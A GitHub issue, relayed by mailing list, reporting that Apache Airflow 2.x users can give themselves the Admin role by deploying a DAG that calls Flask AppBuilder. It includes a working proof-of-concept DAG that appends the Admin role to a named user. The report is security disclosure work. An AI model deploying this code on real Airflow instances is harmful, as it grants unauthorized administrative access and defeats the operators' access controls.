[GitHub] [airflow] rssanders3 opened a new issue #18643: Users able to Update Roles through DAG Definition

[GitBox]

rssanders3 opened a new issue #18643:
URL: https://github.com/apache/airflow/issues/18643


   ### Apache Airflow version
   
   2.0.2
   
   ### Operating System
   
   CentOS
   
   ### Versions of Apache Airflow Providers
   
   N/A
   
   ### Deployment
   
   Virtualenv installation
   
   ### Deployment details
   
   Installation of Apache Airflow is running on Virtual Machines and configured 
with LDAP Authentication:
   ```
   authenticate = True
   auth_backend = airflow.contrib.auth.backends.ldap_auth
   ``` 
   
   ### What happened
   
   While performing a security review of Apache Airflow, the Team appears to 
have discovered a security hole where users can update their own RBAC role or 
the roles of someone else on their team by using the Flask Appbuilder within a 
DAG definition.
   
   ### What you expected to happen
   
   I would hope that users would not be able to update their Roles for security 
purposes.
   
   ### How to reproduce
   
   1. Create a new user with limited permissions (in example username is 
"test-user")
   2. Deploy the following DAG:
   ```
   import airflow
   from airflow.models import DAG
   from airflow.operators.dummy_operator import DummyOperator
   from airflow.www.app import cached_app
   from datetime import timedelta
   
   appbuilder = cached_app().appbuilder
   user = appbuilder.sm.find_user(username='test-user')
   
   print(user)
   print(user.roles)
   
   role = appbuilder.sm.find_role('Admin')
   if role in user.roles:
       pass
   else:
       user.roles.append(role)
   
   default_args = {
       'owner': 'Airflow',
       'start_date': airflow.utils.dates.days_ago(1),
   }
   
   dag = DAG(
       dag_id='appbuilder-test',
       default_args=default_args,
       schedule_interval=None,
       dagrun_timeout=timedelta(60),
   )
   
   start_task = DummyOperator(task_id="start", dag=dag)
   ```
   3. Open the Airflow Webserver as the Admin user and see that the "test-user" 
now has the "Admin" role assigned
   
   ### Anything else
   
   Confirmed that this is an issue with other versions of Apache Airflow 2.x, 
including the latest stable release: 2.1.4.
   
   ### Are you willing to submit PR?
   
   - [X] Yes I am willing to submit a PR!
   
   ### Code of Conduct
   
   - [X] I agree to follow this project's [Code of 
Conduct](https://github.com/apache/airflow/blob/main/CODE_OF_CONDUCT.md)
   


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: commits-unsubscr...@airflow.apache.org

For queries about this service, please contact Infrastructure at:
us...@infra.apache.org